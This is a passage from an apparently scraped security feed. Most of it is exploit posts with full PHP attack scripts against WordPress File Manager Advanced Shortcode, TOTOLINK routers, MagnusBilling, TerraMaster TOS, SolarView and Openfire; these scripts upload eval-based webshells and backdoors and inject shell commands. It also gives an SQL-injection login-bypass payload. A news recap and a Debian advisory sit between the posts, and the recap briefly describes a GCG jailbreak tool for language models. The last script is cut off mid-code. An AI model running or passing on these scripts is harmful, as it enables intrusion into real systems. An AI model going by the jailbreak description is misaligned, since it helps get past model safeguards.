WordPress File Manager Advanced Shortcode plugin version 2.3.2 suffers from a code injection vulnerability that allows for remote shell upload.

    =============================================================================================================================================| # Title     : WordPress File Manager Advanced Shortcode 2.3.2 Code Injection Vulnerability                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://advancedfilemanager.com/product/file-manager-advanced-shortcode-wordpress/                                          |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 106 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass MetasploitModule {    private $targetUri;    private $webshellName;    private $wpData;    private $uploadPath;    private $postParam;    private $getParam;    public function __construct($targetUri, $webshell = null, $command = 'passthru') {        $this->targetUri = $targetUri;        $this->webshellName = $webshell ?: $this->generateRandomWebshellName();        $this->postParam = $this->generateRandomString();        $this->getParam = $this->generateRandomString();    }    private function generateRandomWebshellName() {        return bin2hex(random_bytes(rand(8, 16))) . '.php';    }    private function generateRandomString($length = 8) {        return bin2hex(random_bytes($length));    }    private function getFormData($pngWebshell) {        // Construct multipart form data        $boundary = md5(time());        $formData = "--$boundary\r\n";        $formData .= "Content-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n";        $formData .= "--$boundary\r\n";        $formData .= "Content-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n";        $formData .= "--$boundary\r\n";        $formData .= "Content-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n";        $formData .= "--$boundary\r\n";        $formData .= "Content-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n";        $formData .= "--$boundary\r\n";        $formData .= "Content-Disposition: form-data; name=\"_fmakey\"\r\n\r\n{$this->wpData['fmakey']}\r\n";        $formData .= "--$boundary\r\n";        $formData .= "Content-Disposition: form-data; name=\"path\"\r\n\r\n{$this->uploadPath}\r\n";        $formData .= "--$boundary\r\n";        $formData .= "Content-Disposition: form-data; name=\"upload[]\"; filename=\"{$this->webshellName}\"\r\n";        $formData .= "Content-Type: image/png, text/x-php\r\n\r\n" . $pngWebshell . "\r\n";        $formData .= "--$boundary--\r\n";        return ['data' => $formData, 'boundary' => $boundary];    }    private function uploadWebshell($pngWebshell) {        $formData = $this->getFormData($pngWebshell);        $response = $this->sendRequest('POST', "/wp-admin/admin-ajax.php", $formData['data'], [            "Content-Type: multipart/form-data; boundary={$formData['boundary']}"        ]);        // Handle response and check for upload success        $responseData = json_decode($response, true);        if (isset($responseData['added'][0]['name']) && $responseData['added'][0]['name'] == $this->webshellName) {            return true;        }                return false;    }    private function injectPhpPayloadPng($payload) {        // Here you should inject PHP code into a PNG file        // This is just a placeholder for the actual implementation        return $payload; // Placeholder for the injected PNG    }    private function executeCommand($cmd) {        $payload = base64_encode($cmd);        $this->sendRequest('POST', "/{$this->wpData['baseurl']}/{$this->uploadPath}/{$this->webshellName}", [            $this->getParam => 'passthru', // replace with the command function            $this->postParam => $payload        ]);    }    private function sendRequest($method, $uri, $data, $headers = []) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $this->targetUri . $uri);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);        if ($method == 'POST') {            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        $response = curl_exec($ch);        curl_close($ch);        return $response;    }    public function exploit() {        // Check for vulnerabilities and upload webshell logic        $payload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";        $pngWebshell = $this->injectPhpPayloadPng($payload);        if ($this->uploadWebshell($pngWebshell)) {            $this->executeCommand('whoami'); // Replace 'whoami' with your desired command        } else {            echo "Failed to upload webshell.";        }    }}// Usage example$exploit = new MetasploitModule('http://target-uri.com');$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

WordPress File Manager Advanced Shortcode 2.3.2 Code Injectin / Shell Upload

TOTOLINK version 9.x suffers from a remote command injection vulnerability.

=============================================================================================================================================  
| # Title     : TOTOLINK 9.x Code Injection Vulnerability                                                                                   |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |  
| # Vendor    : https://www.totolink.net/                                                                                                   |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 71 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php

class TotolinkExploit {  
    private $targetUri;  
    private $sleepTime;

    public function __construct($targetUri, $sleepTime = 3) {  
        $this->targetUri = $targetUri;  
        $this->sleepTime = $sleepTime;  
    }

    // Function to send POST request and execute the command on the target  
    public function executeCommand($cmd) {  
        $num = rand(1, 500);  
        $url = $this->targetUri . '/cgi-bin/cstecgi.cgi';  
        $data = json_encode([  
            "command" => "127.0.0.1; {$cmd};#",  
            "num" => $num,  
            "topicurl" => "setTracerouteCfg"  
        ]);

        // Send POST request  
        return $this->sendPostRequest($url, $data);  
    }

    // Check if the target is vulnerable  
    public function check() {  
        echo "Checking if the target can be exploited.\n";

        // Test using echo command to see if it's vulnerable  
        $response = $this->executeCommand("echo test");  
        if (!$response || strpos($response, 'success') === false) {  
            return "Target is likely not vulnerable.\n";  
        }

        // Test command injection using sleep  
        echo "Performing command injection test with sleep of {$this->sleepTime} seconds.\n";  
        $start = microtime(true);  
        $this->executeCommand("sleep {$this->sleepTime}");  
        $elapsedTime = microtime(true) - $start;

        echo "Elapsed time: " . round($elapsedTime, 2) . " seconds.\n";  
        if ($elapsedTime >= $this->sleepTime) {  
            return "Target is vulnerable: Blind command injection successful.\n";  
        }

        return "Command injection test failed.\n";  
    }

    // Exploit the vulnerability to run the payload  
    public function exploit($payload) {  
        echo "Executing payload on the target.\n";  
        $this->executeCommand($payload);  
    }

    // Helper function to send POST requests  
    private function sendPostRequest($url, $postFields) {  
        $options = [  
            'http' => [  
                'method' => 'POST',  
                'header' => 'Content-Type: application/x-www-form-urlencoded',  
                'content' => $postFields  
            ]  
        ];  
        $context = stream_context_create($options);  
        return file_get_contents($url, false, $context);  
    }  
}

// Example of usage  
$targetUri = 'http://target-ip'; // Replace with actual target URL  
$exploit = new TotolinkExploit($targetUri);  
echo $exploit->check();  
$exploit->exploit('whoami'); // Replace with your payload

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

TOTOLINK 9.x Command Injection

MagnusBilling version 7.x suffers from a remote command injection vulnerability.

=============================================================================================================================================  
| # Title     : MagnusBilling 7.x Code Injection Vulnerability                                                                              |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |  
| # Vendor    : https://www.magnusbilling.org/                                                                                              |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 83 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php

class MagnusBillingExploit {  
    private $targetUri;  
    private $webShellName;

    public function __construct($targetUri) {  
        $this->targetUri = $targetUri;  
    }

    // Function to execute commands on the target  
    public function executeCommand($cmd) {  
        $url = $this->targetUri . '/lib/icepay/icepay.php?democ=/dev/null;' . $cmd . ';#';  
        return file_get_contents($url); // Send HTTP request  
    }

    // Function to execute PHP code on the target  
    public function executePhp($cmd) {  
        $payload = base64_encode($cmd);  
        $url = $this->targetUri . '/lib/icepay/' . $this->webShellName;  
        $postFields = [$this->postParam => $payload];  
        return $this->sendPostRequest($url, $postFields); // Send POST request  
    }

    // Upload backdoor webshell to the target  
    public function uploadBackdoorWebShell() {  
        // Name of the webshell to be uploaded  
        $this->webShellName = "backdoor.php"; // Set a specific name for the backdoor file

        // Backdoor PHP code (this allows execution of commands passed through a GET parameter 'cmd')  
        $backdoorCode = "<?php if(isset(\$_GET['cmd'])){system(\$_GET['cmd']);} ?>";

        // Encode the webshell content  
        $encodedPayload = base64_encode($backdoorCode);

        // Construct the command to upload the backdoor  
        $cmd = "echo {$encodedPayload} | base64 -d > ./{$this->webShellName}";

        // Execute the command to upload the backdoor  
        return $this->executeCommand($cmd);  
    }

    // Check if the target can be exploited  
    public function check() {  
        $url = $this->targetUri;  
        $response = file_get_contents($url);  
        if (!$response || !preg_match('/MagnusBilling/i', $response)) {  
            return "Safe: Likely not a MagnusBilling application.";  
        }

        $sleepTime = rand(4, 8);  
        $this->executeCommand("sleep {$sleepTime}");  
        sleep($sleepTime); // Simulate blind command injection

        return "Vulnerable: Command injection successful.";  
    }

    // Main function to exploit the target  
    public function exploit() {  
        echo "Uploading backdoor...\n";  
        $result = $this->uploadBackdoorWebShell();  
        if (!$result) {  
            die("Backdoor upload failed.");  
        }  
        echo "Backdoor uploaded at: {$this->targetUri}/lib/icepay/{$this->webShellName}\n";  
    }

    // Helper function to send POST requests  
    private function sendPostRequest($url, $postFields) {  
        $options = [  
            'http' => [  
                'method' => 'POST',  
                'header' => 'Content-Type: application/x-www-form-urlencoded',  
                'content' => http_build_query($postFields)  
            ]  
        ];  
        $context = stream_context_create($options);  
        return file_get_contents($url, false, $context);  
    }  
}

// Usage example  
$exploit = new MagnusBillingExploit('http://target-url/mbilling');  
$exploit->exploit();

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

MagnusBilling 7.x Command Injection

Bookstore Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Bookstore Management System v1.0 SQL injection Vulnerability                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202303/kashipara.com_bms-zip.zip                              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass : ' or 0=0 ##[+] hLOgin : http://127.0.0.1/BMS/admin/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Bookstore Management System 1.0 SQL Injection

Hey there, it's your weekly dose of "what the heck is going on in cybersecurity land" – and trust me, you NEED to be in the loop this time. We've got everything from zero-day exploits and AI gone rogue to the FBI playing crypto kingpin – it's full of stuff they don't 🤫 want you to know.
So let's jump in before we get FOMO.
⚡ Threat of the Week
GoldenJackal Hacks Air-Gapped Systems: Meet

Hey there, it's your weekly dose of "_what the heck is going on in cybersecurity land_" – and trust me, you NEED to be in the loop this time. We've got everything from zero-day exploits and AI gone rogue to the FBI playing crypto kingpin – it's full of stuff they don't 🤫 want you to know.

So let's jump in before we get FOMO.

****⚡ Threat of the Week****

**GoldenJackal Hacks Air-Gapped Systems:** Meet GoldenJackal, the hacking crew you've probably never heard of – but should definitely know about now. They're busting into super-secure, air-gapped computer systems with sneaky worms spread through infected USB drives (yes, really!), proving that even the most isolated networks aren't safe. ESET researchers caught them red-handed using two different custom-made tools to target high-profile victims, including a South Asian embassy in Belarus and a European Union government organization.

****🔔 Top News****

*   **Mozilla Patches Firefox 0-Day:** Mozilla patched a critical zero-day flaw in its Firefox browser that it said has been actively exploited in the wild to target Tor browser users. While there are currently no details on the attacks, users are advised to update to Firefox 131.0.2, Firefox ESR 128.3.1, and Firefox ESR 115.16.1.
*   **Contagious Interview Remains Lucrative for N. Korea:** Ever since details about a North Korean hacking campaign called Contagious Interview came to light nearly a year ago, it has continued to target the technology sector with no signs of stopping anytime soon. These attacks aim to deliver backdoors and information-stealing malware by deceiving developers into executing malicious code under the pretext of a coding assignment as part of a job interview after approaching them on platforms like LinkedIn.
*   **OpenAI Disrupts Malicious Operations:** OpenAI said it has disrupted over 20 malicious cyber operations since the start of the year that abused its generative artificial intelligence (AI) chatbot, ChatGPT, for debugging and developing malware, spreading misinformation, evading detection, and vulnerability research. One of the activity clusters was observed targeting OpenAI employees via spear-phishing attacks to deploy the SugarGh0st RAT.
*   **FBI Creates Fake Crypto to Disrupt Fraudulent Operation:** The U.S. Federal Bureau of Investigation (FBI) took the "unprecedented step" of creating its own cryptocurrency token and a company called NexFundAI to take down a fraud operation that allegedly manipulated digital asset markets by orchestrating an illegal scheme known as wash trading. A total of 18 people and entities have been charged in connection with the pump-and-dump scam, with three arrests reported so far.
*   **Gorilla Botnet Launches 300,000 DDoS Attacks Across 100 Countries:** A botnet malware family called Gorilla issued over 300,000 attack commands in the month of September 2024 alone, targeting universities, government websites, telecoms, banks, gaming, and gambling sectors. China, the U.S., Canada, and Germany. The botnet is based on the leaked Mirai botnet source code.

****📰 Around the Cyber World****

*   **Microsoft Announces Windows 11 Security Baseline:** Microsoft has released the Windows 11, version 24H2 security baseline with added protections to LAN Manager, Kerberos, User Account Control, and Microsoft Defender Antivirus. It also includes Windows Protected Print (WPP), which the company described as the "new, modern and more secure print for Windows built from the ground up with security in mind." In a related development, the tech giant announced a redesigned Windows Hello experience and API support for third-party passkey providers like 1Password and Bitwarden to plug into the Windows 11 platform.
*   **Apple macOS iPhone Mirroring is Broken:** Apple announced a new iPhone mirroring feature with macOS 15.0 Sequoia, but cybersecurity firm Sevco has uncovered a privacy risk that could expose metadata associated with apps on an employee's personal iPhone to their corporate IT department. The issue stems from the fact that the iOS apps mirrored to the Mac populate the same application metadata as native macOS applications, thereby leaking information about the apps that may be installed on their phones. Apple has acknowledged the problem and is said to be working on a fix.
*   **Social Engineering Via Phone Calls:** Threat actors have found an effective social engineering vector in phone calls in order to trick users into performing an unintended action, a technique also called telephone-oriented attack delivery (TOAD), callback phishing, and hybrid vishing (a combination of voice and phishing). Intel 471 said it has observed a "sharp increase in underground offers for illicit call center services that can aid in malware delivery, ransomware-related calls, and other fraud-oriented social-engineering attempts."
*   **Malicious Extensions Can Bypass Manifest V3:** Google has said Manifest V3, its latest version of the extensions platform, avoids the security loopholes of its predecessor, which allowed browser add-ons to have excessive permissions and inject arbitrary JavaScript. However, new research has found that it's still possible for malicious actors to exploit minimal permissions and steal data. The findings were presented by SquareX at the DEF CON conference back in August. The research also coincides with a study that discovered "hundreds of extensions automatically extracting user content from within web pages, impacting millions of users."
*   **What can a USB reveal?:** A new analysis from Group-IB goes into detail about the artifacts generated in the USB device when files are accessed or modified on devices running various operating systems. "USB formatted with NTFS, FAT32, and ExFAT often create temporary files, particularly during file modifications," the company said. "USB formatted with NTFS on Windows provided more information on file system changes from the $Logfile due to its journaling capabilities." USB formatted with HFS+ has been found to store versions of files that have been edited with GUI tools in a versioning database. Likewise, USB formatted with FAT32/ExFAT on macOS generates ". \_filename" files to ensure file system compatibility for storing extended attributes.

**🔥 **Cybersecurity Resources & Insights****

*   **Expert Webinars**
    *   **Building a Successful Data Security Posture Management Program**: Drowning in data security headaches? Hear directly from Global-e's CISO how Data Security Posture Management (DSPM) transformed their data security. Get real-world insights, and practical advice, get your questions answered and actionable strategies in this exclusive webinar, and walk away with a clear roadmap. Reserve your seat today!
    *   **Ex-Mandiant Expert Exposes Identity Theft Tactics**: LUCR-3 is breaching organizations like yours through identity-based attacks. Learn how to protect your cloud and SaaS environments from this advanced threat. Cybersecurity expert Ian Ahl (former Mandiant) reveals the latest tactics and how to defend your organization. Register for this crucial webinar to gain the upper hand.
*   **Ask the Expert**
    *   **Q: With mobile devices increasingly targeted by cybercriminals, how can individuals protect their devices from network-based attacks, especially in unfamiliar or high-risk environments, such as when traveling?**
    *   **A:** When you're traveling, your mobile device can be a target for attacks like rogue base stations—fake cell towers set up to steal data or track your location. To protect yourself, start by enabling Lockdown Mode on iPhones, which blocks vulnerable 2G connections. Always use a VPN to keep your internet traffic encrypted and avoid using public Wi-Fi without it. A great tool to boost your awareness is the CellGuard app for iOS. It scans your network for suspicious activity, like rogue base stations, by analyzing things like signal strength and network anomalies. While it may flag some false alarms, it gives you an extra layer of protection.
*   **Cybersecurity Tools**
    *   **Broken Hill: A New Tool to Test AI Models' Weaknesses** \- It is an advanced tool that makes it easy to trick large AI models into misbehaving by bypassing their restrictions. It uses the Greedy Coordinate Gradient (GCG) attack to craft clever prompts that push popular models, like Llama-2 and Microsoft's Phi, to respond in ways they normally wouldn't. The best part? You can run it on consumer GPUs, like the Nvidia RTX 4090, without needing costly cloud servers. Ideal for researchers and security testers, Broken Hill helps uncover and fix vulnerabilities in AI models, making it a must-have tool in the fight against AI threats.
*   **Tip of the Week**
    *   **Your Browser Extensions Are Spying on You:** Browser extensions can be useful but also risky, with potential access to your data or hidden malware. Protect yourself by removing unused extensions, checking their permissions, and only allowing them to run on specific sites. Enable "Click to activate" for more control, and use tools like Chrome's Extension Source Viewer to spot any suspicious behavior. Keep extensions updated, monitor network traffic for unusual activity, and consider using a separate browser for sensitive tasks. Features like Firefox's Temporary Container Tabs can also help by isolating extension access. These simple steps can keep your browsing safer.

****Conclusion****

And that's how the cybersecurity cookie crumbles this week! But listen, before you log off and chill, remember this: always double-check the sender's email address before clicking any links, even if it looks like it's from your bestie or your bank. Phishing scams are getting sneakier than ever, so stay sharp! Until next time, stay safe and cyber-aware!

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

THN Cybersecurity Recap: Top Threats, Tools and Trends (Oct 7 - Oct 13)

Debian Linux Security Advisory 5788-1 - Damien Schaeffer discovered a use-after-free in the Mozilla Firefox web browser, which could result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5788-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 10, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2024-9680Damien Schaeffer discovered a use-after-free in the Mozilla Firefox webbrowser, which could result in the execution of arbitrary code.For the stable distribution (bookworm), this problem has been fixed inversion 128.3.1esr-1~deb12u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcH/n8ACgkQEMKTtsN8TjYY2xAAiU75PrzOQQ5nku0M0yvcPSpvHPY87erXxc1sAdV/vCSMqygCmkfwRzytDmEqwYwBlHNLSbqOPNYL4bmaj7yzJYfQPqI6hQxr0DMMPY3H3wLyHqMWgfnkoyyyntMys2zU0ZNwGa14KVdyrjnoE13wlhbHY4cJkZU1dhehxRMQEDmAmIwmsXx646/ecVFSJdEp0Wm9muDy9F2dI50YSyPrWwj8zbhqC72qNzGgDHQtiCEcMNaEvDoi48VFMxMGe5EOS6G993R5Hi2rcsd7fyE9/0fWCeZ7JUiXq/inXCcQusV7monLrP7Yy29gROgoj5smz9MMGS3viDblSf+o1P7F3hUqePE5HLvMSiJgXMtMMdD+j4aSYyApmkqFhHpY2zHZpVHK0lZWS+gneVHZZBLmTUVN/T81GQnsHGSHMIucSrMOc78qSruf5khZo2Xl0HIyrCvCYsmjPLhcWBnBQjgW20wtC6mKWWTKQOsMBISppORbJYXSEJbVDaAsbNp5Yvj7SrywjdzzzFK60BkGUFCNoqmtm0oharUtt3R/uZJ+Ta2KG7r6SsHg9T/cQOnx6l/r946bBNzTtk6ifGQRVa4ScVeLF1Ar6GZSgb3fMCJE340U8/UJ/LXj/5kfiva5oYg0Y57zDVh0whBJgyQk+h5rh+AXOILyF67u7mYLaZ/bpSk==z+e7-----END PGP SIGNATURE-----

Debian Security Advisory 5788-1

TerraMaster TOS version 4.2.29 suffers from a remote code injection vulnerability leveraging a local file inclusion vulnerability.

    =============================================================================================================================================| # Title     : TerraMaster TOS 4.2.29 Code Injection Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.terra-master.com/global/alltos/                                                                                 |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 138 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass TerraMasterExploit{    private $targetUri;    private $data = [];    private $terramaster = [];    public function __construct($targetUri)    {        $this->targetUri = rtrim($targetUri, '/') . '/';    }    public function getData()    {        // Get the data by exploiting the LFI vulnerability through vulnerable endpoint `api.php?mobile/webNasIPS`        $response = $this->sendRequest('POST', 'module/api.php?mobile/webNasIPS', ['User-Agent' => 'TNAS']);                if ($response && strpos($response, 'webNasIPS successful') !== false) {            // Parse the JSON response and get the data            $resJson = json_decode($response, true);            if (!empty($resJson['data'])) {                $this->data['password'] = trim(explode('SAT', explode('PWD:', $resJson['data'])[1])[0]);                $this->data['mac'] = trim(explode('"', explode('mac":"', $resJson['data'])[1])[0]);                $this->data['key'] = substr($this->data['mac'], 6, 6); // last three MAC address entries                $this->data['timestamp'] = time();                // derive signature                $this->data['signature'] = $this->tosEncryptStr($this->data['key'], $this->data['timestamp']);            }        }    }    private function tosEncryptStr($key, $strToEncrypt)    {        $id = $key . $strToEncrypt;        return md5($id);    }    public function executeCommand($cmd)    {        // Execute RCE using vulnerable endpoint `api.php?mobile/createRaid`        $diskstring = $this->generateRandomString(4, 8);        $headers = [            'User-Agent' => 'TNAS',            'Authorization' => $this->data['password'],            'Signature' => $this->data['signature'],            'Timestamp' => $this->data['timestamp']        ];        $this->sendRequest('POST', 'module/api.php?mobile/createRaid', [            'raidtype' => ';' . $cmd,            'diskstring' => $diskstring        ], $headers);    }    public function getTerramasterInfo()    {        // get Terramaster CPU architecture and TOS version        $response = $this->sendRequest('GET', 'tos/index.php?user/login');        if ($response) {            preg_match('/ver=.+?"/', $response, $matches);            if ($matches) {                $version = $matches[0];                // check if architecture is ARM64 or X64                if (strpos($version, '_A') !== false) {                    $this->terramaster['cpu_arch'] = 'ARM64';                } elseif (strpos($version, '_S') !== false || strpos($version, '_Q') !== false) {                    $this->terramaster['cpu_arch'] = 'X64';                } else {                    $this->terramaster['cpu_arch'] = 'UNKNOWN';                }                // strip TOS version number and remove trailing double quote.                $this->terramaster['tos_version'] = rtrim(substr($version, strpos($version, '.0_') + 3), '"');            }        }    }    public function check()    {        $this->getTerramasterInfo();        if (empty($this->terramaster)) {            return 'Safe';        }        if (version_compare($this->terramaster['tos_version'], '4.2.29', '<=') === 0) {            return "Vulnerable: TOS version is {$this->terramaster['tos_version']} and CPU architecture is {$this->terramaster['cpu_arch']}.";        }        return "Safe: TOS version is {$this->terramaster['tos_version']} and CPU architecture is {$this->terramaster['cpu_arch']}.";    }    public function exploit()    {        $this->getData();        if (empty($this->data)) {            throw new Exception('Cannot retrieve the leaked data.');        }        echo "Executing exploit...\n";        // Example command to execute        $this->executeCommand('whoami'); // Replace 'whoami' with desired command    }    private function sendRequest($method, $uri, $data = [], $headers = [])    {        $url = $this->targetUri . $uri;        $options = [            CURLOPT_RETURNTRANSFER => true,            CURLOPT_CUSTOMREQUEST => strtoupper($method),            CURLOPT_HTTPHEADER => array_merge(['Content-Type: application/x-www-form-urlencoded'], $headers)        ];        if (strtoupper($method) === 'POST') {            $options[CURLOPT_POSTFIELDS] = http_build_query($data);        } else {            $options[CURLOPT_URL] = $url;        }        $ch = curl_init();        curl_setopt_array($ch, $options);        $response = curl_exec($ch);        curl_close($ch);        return $response;    }    private function generateRandomString($minLength, $maxLength)    {        $length = rand($minLength, $maxLength);        return substr(str_shuffle(str_repeat("ABCDEFGHIJKLMNOPQRSTUVWXYZ", $maxLength)), 0, $length);    }}// Usage$exploit = new TerraMasterExploit('http://target-terramaster-url.com');$check = $exploit->check();echo $check . "\n";if (strpos($check, 'Vulnerable') !== false) {    $exploit->exploit();}Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

TerraMaster TOS 4.2.29 Code Injection / Local File Inclusion

SolarView Compact version 6.00 suffers from a PHP code injection vulnerability.

=============================================================================================================================================  
| # Title     : SolarView Compact 6.00 Code Injection Vulnerability                                                                         |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |  
| # Vendor    : https://www.contec.com/                                                                                                     |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 112 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php

class SolarViewExploit {  
    private $targetUri;  
    private $webshellName;  
    private $postParam;  
    private $timeout;

    public function __construct($targetUri, $timeout = 40) {  
        $this->targetUri = rtrim($targetUri, '/');  
        $this->timeout = $timeout;  
    }

    public function uploadWebshell($webshell = null) {  
        // Randomize file name if option WEBSHELL is not set  
        $this->webshellName = $webshell ?? $this->generateRandomFileName();

        $this->postParam = $this->generateRandomString(8);

                // Inject PHP payload into the PLTE chunk of a PNG image to hide the payload  
        $phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";  
        $pngWebshell = $this->injectPhpPayloadPng($phpPayload);

        if ($pngWebshell === null) {  
            return null;  
        }

        // Encode webshell data and write to file on the target at the tmp directory for execution  
        $payload = base64_encode($pngWebshell);  
        $cmd = "echo {$payload}|base64 -d >tmp/{$this->webshellName}";  
        return $this->executeCommand($cmd);  
    }

    public function executePhp($cmd) {  
        $payload = base64_encode($cmd);  
        return $this->sendRequest('POST', "/tmp/{$this->webshellName}", [  
            $this->postParam => $payload  
        ]);  
    }

    public function executeCommand($cmd) {  
        // Encode payload with base64 to ensure proper execution  
        $payload = base64_encode($cmd);  
        $cmd = "echo {$payload}|base64 -d|bash";  
        return $this->sendRequest('GET', '/downloader.php', [  
            'file' => ";{$cmd};.zip"  
        ]);  
    }

    public function check() {  
        // Checking if the target is vulnerable by echoing a randomised marker  
        echo "Checking if {$this->targetUri} can be exploited.\n";  
        $marker = $this->generateRandomString(16);  
        $res = $this->executeCommand("echo {$marker};cat /opt/svc/version");

        if ($res && $res['code'] == 200 && strpos($res['body'], $marker) !== false) {  
            if (preg_match('/SolarView Compact ver\.\d\.\d\d/', $res['body'], $matches)) {  
                return "Vulnerable: " . $matches[0];  
            }  
        }  
        return 'Safe: No valid response received from the target.';  
    }

    public function exploit($payload) {  
        echo "Executing payload on {$this->targetUri}.\n";  
        $res = $this->uploadWebshell();

        if (!$res || $res['code'] !== 200) {  
            throw new Exception('Web shell upload error.');  
        }

        $this->executePhp($payload);  
    }

    private function sendRequest($method, $uri, $params) {  
        $url = $this->targetUri . $uri;  
        $options = [  
            'http' => [  
                'method' => $method,  
                'header' => 'Content-Type: application/x-www-form-urlencoded',  
                'timeout' => $this->timeout,  
                'content' => http_build_query($params)  
            ]  
        ];

        $context = stream_context_create($options);  
        $response = @file_get_contents($url, false, $context);  
        $code = isset($http_response_header[0]) ? intval(substr($http_response_header[0], 9, 3)) : 0;

        return [  
            'code' => $code,  
            'body' => $response  
        ];  
    }

    private function injectPhpPayloadPng($phpPayload) {  
        // Here you would implement the logic to inject the PHP payload into a PNG file.  
        // This is a placeholder implementation.  
        return $phpPayload; // Modify this to return the actual PNG with embedded PHP payload.  
    }

    private function generateRandomFileName($length = 16) {  
        return bin2hex(random_bytes($length / 2)) . '.php';  
    }

    private function generateRandomString($length) {  
        return bin2hex(random_bytes($length / 2));  
    }  
}

// Example of usage  
$targetUri = 'http://target-ip'; // Replace with the actual target URL  
$exploit = new SolarViewExploit($targetUri);  
echo $exploit->check();  
$exploit->exploit('whoami'); // Replace with your payload

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

SolarView Compact 6.00 Code Injection

Openfire version 4.8.0 suffers from authentication bypass and code injection vulnerabilities.

    =============================================================================================================================================| # Title     : Openfire release 4.8.0 Code Injection Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.igniterealtime.org/projects/openfire/                                                                           |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 115 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass OpenfireExploit{    private $targetUrl;    private $adminUsername;    private $adminPassword;    private $pluginName;    private $csrfToken;    public function __construct($targetUrl, $adminUsername = null, $adminPassword = null, $pluginName = null)    {        $this->targetUrl = rtrim($targetUrl, '/') . '/';        $this->adminUsername = $adminUsername ?? $this->generateRandomString(8, 15);        $this->adminPassword = $adminPassword ?? $this->generateRandomPassword(8, 10);        $this->pluginName = $pluginName ?? $this->generateRandomString(8, 15);    }    private function generateRandomString($minLength, $maxLength)    {        $length = rand($minLength, $maxLength);        return substr(str_shuffle("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $length);    }    private function 